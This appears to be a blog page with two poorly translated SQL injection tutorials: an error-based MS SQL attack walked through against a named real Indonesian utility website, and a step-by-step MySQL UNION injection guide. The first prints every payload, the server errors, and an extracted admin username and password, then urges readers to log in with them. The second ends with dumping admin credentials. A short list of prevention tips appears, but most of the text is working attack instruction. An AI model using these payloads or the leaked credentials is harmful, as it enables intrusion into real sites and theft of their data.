MS SQL Injection, step by step

Lately, you often hear the term "SQL Injection"?
You know how dangerous this bug?
we will present step by step is SQL Injection.
Note: we will restrict the discussion on SQL Injection in MS-SQL Server.
We'll take the example of site-www.pln wilkaltim.co.id
There are two drawbacks to this site, namely:
1. Tabel News
2. Tabel Admin

The first step, we determine that the holes can be injected with a walk (Enumeration) they will be used on site.
We will find a way 2 model input parameters, namely by entering input through the box and put it through the URL address.

We take the easiest first, by way of the input box. Then we search box for admin login. Www.pln-wilkaltim.co.id/sipm/admin/admin.asp found the first step to determining the table name and fieldnya, we inject NIP box with the command (password is up to you):
' having 1=1--
do not forget to write the single quotes and double hyphens (important). The second meaning can be a sign they will see www.neoteker.or.id SQL Injection tutorial. Then will come out error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Come out of our first field name
Note the name table : T_ADMIN
Note the name field : NOMOR

Then we will find the next field name, along with a table name may be different.
We injected NIP box (the password is up to you):
' group by T_ADMIN.NOMOR having 1=1--
going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
means that the table names and second our field
record : T_ADMIN.NIP

then we find the third our field
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
record the third table : T_ADMIN.PASSWORD

do the steps above until we find the last field
Here is the error message occurs, if we check the last field by injecting:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(notes the sentence should not be cut line)
--------------------
- nip or password or you have the wrong units !! -
--------------------
We successfully managed to find the last field.
list column (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL

There is only one table for this authentication (ie T_ADMIN),
this will make it easier for our process.

The next step, we determine the structure of the areas mentioned above.

we inject in the box (pass up to you):
' union select sum(NOMOR) from T_ADMIN--

The meaning of the query is: we try to apply the sum clause before determining whether the number of columns in two similar rowsets.
Our language is easy to insert a clause sum (amount) applies to numeric column types, so for typing non-numeric columns, will be out errors that can tell us on the relevant column.
Error message
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
means that the next column type is numeric
next we inject:
' union select sum(NIP) from T_ADMIN--
going out error messages
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
means that NIP column type is char

We must repeat the above command to the next column by replacing nama_kolom in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column we get the column type
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step, we will search the contents of the password field, for the user admin, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
means we choose the minimum user name greater than 'a' and try to turn it into type integer. Meaning the number 1 as 6 times it is that we only choose the NAME column, and ignore the other columns 6.
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
you see:
varchar value 'bill '
'bill' is the name of the user in the last record entered, or the NAMA column in the last record inserted..

next, we inject"
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
notes: to row
Going out error messages:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
means we are successful
we get
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

please login to:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account, is a branch, please fill yourself with trial and error

or we just use the shortcut

we inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
notes: to row

Directly to the admin menu.
Remember: do not make mischief! send admin!


he second hole in the news. There are basically news content from another table.
So can we inject tetep! The difference is, we must enter the parameters in its URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
there are parameters id and idSM
when we try to inject it influential is the parameter id

we inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
Going out error messages:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
means that 'tb_news.NewsId' is first our table n colomn
We repeat the steps above to get
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, next is your own work to develop your knowledge.
You can enter the word that you can determine their own content.
This is why the holes in MS-SQL Server is very dangerous.

=========================================
Specially for ADMIN & WEB PROGRAMMER !!!
========================================
Common prevention strategies used
1. Limit the length of the input box (if possible), by limiting the source code, so a cracker beginners will be confused for a moment to see her input box can not be injected with a long command.
2. Filter input is entered by the user, especially the use of single quotes (Input Validation).
3. Turn off or hide error messages from SQL Server is running.
4. turn off the standard facilities such as Stored Procedures, Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Well it might be what I can tell .....
This is a picture, how the Internet is not secure ...
If you want more secure, off your network cable, disk drives off, from your hard drive, you kompie sale!
Just kidding )

Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Read More......

My SQL Injection Step by Step

SQL injection is a hacking action performed in the client application by modifying the SQL command that already exists in memory and is clien application techniques that exploit web applications using the database for data storage.

that needs to know before the mysql sql injection:
charakter: ‘ or -
comments: /* or –
information_schema for versi: mysql version 5.x , not support for mysql version 4.x

===========
=Firts step:=
===========

find a target
example: [site]/berita.php?id=100

add Charakter ‘ at the end of url or add charakter “-” to see if there is an error message.
example: [site]/berita.php?id=100′ or
[site]/berita.php?id=-100

so the error message

==========
=Second step:=
==========

find and count the number of tables contained in the database ...
use the command : order by

example: [site]/berita.php?id=-100+order+by+1– or
[site]/berita.php?id=-100+order+by+1/*

check one by one ...
example: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

until error or missing error message…
example: [site]/berita.php?id=-100+order+by+9–

means that we take is until number 8
become [site]/berita.php?id=-100+order+by+8–

===========
=Third step:=
===========

to issue what number appears, use command union
because error until number 9
so: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

suppose that the outcome is number 5

use command version() or @@version to check version of sql that used input command in the numbers out last reply
example: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

see the version used replies, if left alone version 4 for this version of our own 4 column table and figure imaginable on the web because they can not use the command From+Information_schema..

to version 5 then you are lucky not to have to guess n table columns such as version 4 version because in version 5 we can use the command From+Information_schema..

============
=Fourth step:=
============

to display the table thereis on the web is
command: table_name >>> included in the figures out last reply
command: +from+information_schema.tables/* >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

example: table that appears is “admin”

===========
=Fifth step:=
===========

to display all the contents of the table, the command is
command: group_concat(table_name) >>> included in the figures out last reply
command: +from+information_schema.tables+where+table_schema=database() >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= Sixth step: =
=============

command: group_concat(column_name) >>> included in the figures out last reply
command: +from+information_schema.columns+where+table_name=0xhexa– >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

at this stage you are required to take the contents of the table to hexadecimal that is by way of converting your website is used for conversion reply :

www.ascii-convert.co.cc

For example words of compassion in the conversion of the admin will be 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0×61646D696E–

============
=Seventh step:=
============

to make what were formerly excluded from the table that is the way

command: concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> included in the figures out last reply
command: +from+(nama table berasal) >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi column),6,7,8+from+(nama table berasal)–

examples of words that came out was id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin–

==============
= Eighth step:=
==============

Last step search admin page or login

then up to you because the web of power in your hands

Read More......
Powered by NGELIH